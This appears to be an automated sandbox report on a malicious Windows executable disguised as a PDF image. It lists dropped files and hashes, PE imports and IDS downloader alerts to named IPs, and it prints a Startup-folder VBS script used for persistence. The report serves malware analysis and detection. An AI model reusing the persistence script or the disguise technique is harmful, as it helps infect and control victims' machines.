Preview:	EA06.....C..Z..L...M?>.Y..j...V.A.R..J..Y.....#...I.O.I..(9.....[.s...)..s...."..d....)..d..D.wj.......yU.U)U...&c..b.M.Q.......[..:.L.A).]...L..;.OT..).P.".I..#..e.. .Uj......&u..)t...Qj1NmV.Z..+`.L..Y..]....n.U.."1z.c.\....5jEd......mT.e..G.....".C0.M@........R.J.."\| .d..<.I.`.'"..".(4.......;..z.b.b....]V.F.....8...R.&~.=F.......j......)..GIi.Uo..e...Dhi.....I..@?..\|.w^.~....f.#.mn.U.P+..Z......2."^..K..!4.D-............RL..J...H.!_.f'.......#.J..s..j...V.K.Xp.K....Tj..5.A.r......Y.....".ei...J..].]..V...Y-.J.:._..i.{`.#H.H.U..\.V...._M%.Vh.....W.R)..Tv.+......"._.....z.0.\.5;.2.U.Z..Z.....\..-".Q..l....\..m.9Ul. .S,6.M...Q.t.WV.J....J.....j.V.E...YU<...To.j.V..T.o....[..)s.m*.J....J.bYY...+}Via..&....S...T....@.Pi.Z...L...u....T.Gi.Y}..T.....i.....]N..j5J...9..)t....1..j.j...A.Ri.....[..#`....L..$@.E:.D.M..JD....Jg ....)..n..U..4....Km.J.J$..lF.Z..f.z.B.s..(S..:oP.E...p.I~..,t.D.\|.BY..YWx.. ..H...L.."..V.z...~.U..`.R.7.^.T.',..........

C:\Users\user\AppData\Local\Temp\autF9F7.tmp

Download File

Process:	C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	94986
Entropy (8bit):	7.933213566042837
Encrypted:	false
SSDEEP:	1536:d/uhaAeJWTfyWmou1Cuk+v3mvw1uLp0zLzvxitHwj7OJLliYchjmCcx3Zy5R20:EVUWTfyWm7Civ3mvdpKxi1wGJLliYch1
MD5:	D74CAF592506F2278ABBB1C537A92477
SHA1:	F50CFCD745D4BC23E86A43878EA681F7A683AB6B
SHA-256:	57A4A23B0DA9F533DC8C9D1D8199F653CAD8D93244F322AC60FFEDCD9B118C68
SHA-512:	B183F8C87186D8BE985DADBD401D044A47024457F5AEBDC4E7EF978AD4A32AB9555A40A76DD0DA4020FFC7B1943C5D9EBB03EC4F83F92F7CAEB3B4E23244E82F
Malicious:	false
Reputation:	low
Preview:	EA06.....C..Z..L...M?>.Y..j...V.A.R..J..Y.....#...I.O.I..(9.....[.s...)..s...."..d....)..d..D.wj.......yU.U)U...&c..b.M.Q.......[..:.L.A).]...L..;.OT..).P.".I..#..e.. .Uj......&u..)t...Qj1NmV.Z..+`.L..Y..]....n.U.."1z.c.\....5jEd......mT.e..G.....".C0.M@........R.J.."\| .d..<.I.`.'"..".(4.......;..z.b.b....]V.F.....8...R.&~.=F.......j......)..GIi.Uo..e...Dhi.....I..@?..\|.w^.~....f.#.mn.U.P+..Z......2."^..K..!4.D-............RL..J...H.!_.f'.......#.J..s..j...V.K.Xp.K....Tj..5.A.r......Y.....".ei...J..].]..V...Y-.J.:._..i.{`.#H.H.U..\.V...._M%.Vh.....W.R)..Tv.+......"._.....z.0.\.5;.2.U.Z..Z.....\..-".Q..l....\..m.9Ul. .S,6.M...Q.t.WV.J....J.....j.V.E...YU<...To.j.V..T.o....[..)s.m*.J....J.bYY...+}Via..&....S...T....@.Pi.Z...L...u....T.Gi.Y}..T.....i.....]N..j5J...9..)t....1..j.j...A.Ri.....[..#`....L..$@.E:.D.M..JD....Jg ....)..n..U..4....Km.J.J$..lF.Z..f.z.B.s..(S..:oP.E...p.I~..,t.D.\|.BY..YWx.. ..H...L.."..V.z...~.U..`.R.7.^.T.',..........

C:\Users\user\AppData\Local\Temp\autFB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Wausaukee\silvexes.exe
File Type:	data
Category:	dropped
Size (bytes):	94986
Entropy (8bit):	7.933213566042837
Encrypted:	false
SSDEEP:	1536:d/uhaAeJWTfyWmou1Cuk+v3mvw1uLp0zLzvxitHwj7OJLliYchjmCcx3Zy5R20:EVUWTfyWm7Civ3mvdpKxi1wGJLliYch1
MD5:	D74CAF592506F2278ABBB1C537A92477
SHA1:	F50CFCD745D4BC23E86A43878EA681F7A683AB6B
SHA-256:	57A4A23B0DA9F533DC8C9D1D8199F653CAD8D93244F322AC60FFEDCD9B118C68
SHA-512:	B183F8C87186D8BE985DADBD401D044A47024457F5AEBDC4E7EF978AD4A32AB9555A40A76DD0DA4020FFC7B1943C5D9EBB03EC4F83F92F7CAEB3B4E23244E82F
Malicious:	false
Reputation:	low
Preview:	EA06.....C..Z..L...M?>.Y..j...V.A.R..J..Y.....#...I.O.I..(9.....[.s...)..s...."..d....)..d..D.wj.......yU.U)U...&c..b.M.Q.......[..:.L.A).]...L..;.OT..).P.".I..#..e.. .Uj......&u..)t...Qj1NmV.Z..+`.L..Y..]....n.U.."1z.c.\....5jEd......mT.e..G.....".C0.M@........R.J.."\| .d..<.I.`.'"..".(4.......;..z.b.b....]V.F.....8...R.&~.=F.......j......)..GIi.Uo..e...Dhi.....I..@?..\|.w^.~....f.#.mn.U.P+..Z......2."^..K..!4.D-............RL..J...H.!_.f'.......#.J..s..j...V.K.Xp.K....Tj..5.A.r......Y.....".ei...J..].]..V...Y-.J.:._..i.{`.#H.H.U..\.V...._M%.Vh.....W.R)..Tv.+......"._.....z.0.\.5;.2.U.Z..Z.....\..-".Q..l....\..m.9Ul. .S,6.M...Q.t.WV.J....J.....j.V.E...YU<...To.j.V..T.o....[..)s.m*.J....J.bYY...+}Via..&....S...T....@.Pi.Z...L...u....T.Gi.Y}..T.....i.....]N..j5J...9..)t....1..j.j...A.Ri.....[..#`....L..$@.E:.D.M..JD....Jg ....)..n..U..4....Km.J.J$..lF.Z..f.z.B.s..(S..:oP.E...p.I~..,t.D.\|.BY..YWx.. ..H...L.."..V.z...~.U..`.R.7.^.T.',..........

C:\Users\user\AppData\Local\Temp\scroll

Download File

Process:	C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	133632
Entropy (8bit):	6.970446708729698
Encrypted:	false
SSDEEP:	3072:Xuomo6IalgQ+lbANWdwSvmjwBysY9RKRmT91Juq4Yft:+fdtlgQ+lMNWdwSekBUomPQWV
MD5:	56C720C7D02C7688DBA3AF9FE06F1320
SHA1:	24C8180B69BABBC958549CE4C78555FAB04B4CD9
SHA-256:	5ECC138670107A831197DD58D8BA0D64B4D0E86F6DDC854D75AFEC973D084EB7
SHA-512:	8EEA894A8AE0CD5F2A86F242D6DEAD0736C59651ABCF046D81D98B94A417A17BC60AEE53D3B86E422ED7B0963729E830630232EDED56BB65B0E174958CCE75B8
Malicious:	false
Reputation:	low
Preview:	...UVJALON7T..LY.QTHUUJA.KN7TX0LYGQTHUUJALKN7TX0LYGQTHUUJALK.7TX>S.IQ.A.t.@..oc<1Cl)5>3:48j"-% X xR)y5$:h<;j...nZ;<UbTJ[pHUUJALK.rTX\|MZG.y.3UJALKN7T.0NXLP.HU.KAL_N7TX0L'TSTHuUJAlIN7T.0LyGQTJUUNALKN7TX4LYGQTHUUCLKL7TX0LYEQ..UUZAL[N7TX LYWQTHUUJQLKN7TX0LYGQp[WU.ALKN.VX.\YGQTHUUJALKN7TX0LYG.VHYUJALKN7TX0LYGQTHUUJALKN7TX0LYGQTHUUJALKN7TX0LYGQTHUUjALCN7TX0LYGQTH]uJA.KN7TX0LYGQTf!025LKN..Y0LyGQT.TUJCLKN7TX0LYGQTHUuJA,e<D&;0LY.ATHUuHALYN7T.1LYGQTHUUJALKNwTXpb+"=;+UUFALKNwVX0NYGQ\JUUJALKN7TX0LY.QT.UUJALKN7TX0LYGQT(FWJALKN.TX0NYBQ.iTU~.LKM7TX.LYAiuIU.JALKN7TX0LYGQTHUUJALKN7TX0LYGQTHUUJALKN7TX0.$.^...<9.KN7TX0M[DUR@]UJALKN7T&0LY.QTH.UJA{KN7qX0L4GQTlUUJ?LKNITX0(YGQ&HUU+ALK.7TX_LYG?THU+JALUL.tX0FsaQV`tUJKLa.DvX0F.FQTL&vJAF.L7T\ChYG[.KUUN2iKN=.\0L]4wTH_.OALOdmT[.Z_GQO'lUJKLH."RX0WsaQV`oUJKLah7W.%JYGJ~jUW.HLKJ..+-LYAy.HU_>HLKL.^X0HsYS\|.UU@kn5^7T\.Lse/EHUQaAfi0%TX4gYms[UUNjLalI@X0HrG{JJ.AJAHalIAX0HrG{v6CUJEgKd.*O0L]lQ~VW.]ALOd1~:0>`[Q$K:.JAJc.7TR.,YGWTboU4aLKJ5;.0LSa{.HW}I@LAN5W%.LYCSP5bUJEf.N5/a0

C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

Download File

Process:	C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1013760
Entropy (8bit):	6.8942112881551
Encrypted:	false
SSDEEP:	24576:ptb20pkaCqT5TBWgNQ7aAAcsRq68Eoc26A:6Vg5tQ7aAA+3JH5
MD5:	9A4FB2A5A118C7D3FEAFAF6D439FF40E
SHA1:	FFCFF130146653CB19ADDCBBA99F90EF07881AD9
SHA-256:	B1CA4DC79C3EF98789267E703748AC340AA6F84178F7F477E7214F5BBF0BBD78
SHA-512:	DFFDD1031BB2C592C2D58679C63EB623FE7930E348094E15527EB13A66CA5A49F439BD91CA411EC5D590E7FF0C59A6D27B3629DAECA687BE6CCAEABF5820E017
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....Cg..........".................t_............@.......................................@...@.......@......................p..\|....@.......................0..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t....0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Download File

Process:	C:\Users\user\AppData\Local\Wausaukee\silvexes.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.3949809922496703
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1ylRMlWAlPJ636nriIM8lfQVn:DsO+vNloRKQ1uMxC4mA2n
MD5:	3176DBE2DBEA0DDCBE571C985DF4CBCE
SHA1:	499B5CFFA449E572BBC9983B243B41A481764B58
SHA-256:	3BCD43BFCD9F3B858F087772C2B52419CAF3F1B01595CDE36428E42F281A49F3
SHA-512:	0BFB8B1718195A017FB1BEC78E3F5B4DF155A5A26BE55CBA53B3E737CF0DF7B4725D5A0AA0437B863E20C06A733812024A25AC71BF0911C2F1FC6C283CF0EABC
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.W.a.u.s.a.u.k.e.e.\.s.i.l.v.e.x.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.8942112881551
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IMG-20241119-WA0006(162KB).Pdf.exe
File size:	1'013'760 bytes
MD5:	9a4fb2a5a118c7d3feafaf6d439ff40e
SHA1:	ffcff130146653cb19addcbba99f90ef07881ad9
SHA256:	b1ca4dc79c3ef98789267e703748ac340aa6f84178f7f477e7214f5bbf0bbd78
SHA512:	dffdd1031bb2c592c2d58679c63eb623fe7930e348094e15527eb13a66ca5a49f439bd91ca411ec5d590e7ff0c59a6d27b3629daeca687be6ccaeabf5820e017
SSDEEP:	24576:ptb20pkaCqT5TBWgNQ7aAAcsRq68Eoc26A:6Vg5tQ7aAA+3JH5
TLSH:	9925AE1273DE83A5C3B251737E167701AE7BB82506A1FC6B2FD4093DAC20521527E6BB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	74ecccdcd4ccccf0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6743FAB1 [Mon Nov 25 04:18:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F7230B5917Fh
jmp 00007F7230B4C194h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F7230B4C31Ah
cmp edi, eax
jc 00007F7230B4C67Eh
bt dword ptr [004C0158h], 01h
jnc 00007F7230B4C319h
rep movsb
jmp 00007F7230B4C62Ch
cmp ecx, 00000080h
jc 00007F7230B4C4E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7230B4C320h
bt dword ptr [004BA370h], 01h
jc 00007F7230B4C7F0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F7230B4C4BDh
test edi, 00000003h
jne 00007F7230B4C4CEh
test esi, 00000003h
jne 00007F7230B4C4ADh
bt edi, 02h
jnc 00007F7230B4C31Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7230B4C323h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F7230B4C375h
bt esi, 03h
jnc 00007F7230B4C3C8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x2e6b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf3000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x2e6b8	0x2e800	fbdf6dc6a23598b99716254085e3e951	False	0.8766696068548387	data	7.769270181281729	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf3000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc43e0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4508	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.24379432624113476
RT_ICON	0xc4970	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	Great Britain	0.12226775956284153
RT_ICON	0xc5a98	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	Great Britain	0.07017900732302686
RT_ICON	0xc8100	0x194d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.7549791570171376
RT_STRING	0xc9a50	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xc9fe4	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xca670	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcab00	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb0fc	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcb758	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcbbc0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcbd18	0x264bd	data			1.0003570039716692
RT_GROUP_ICON	0xf21d8	0x3e	data	English	Great Britain	0.8548387096774194
RT_GROUP_ICON	0xf2218	0x14	data	English	Great Britain	1.15
RT_VERSION	0xf222c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xf2308	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T08:49:02.772788+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	193.122.6.168	80	TCP
2024-11-25T08:49:05.413558+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	193.122.6.168	80	TCP
2024-11-25T08:49:07.037148+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	172.67.177.134	443	TCP
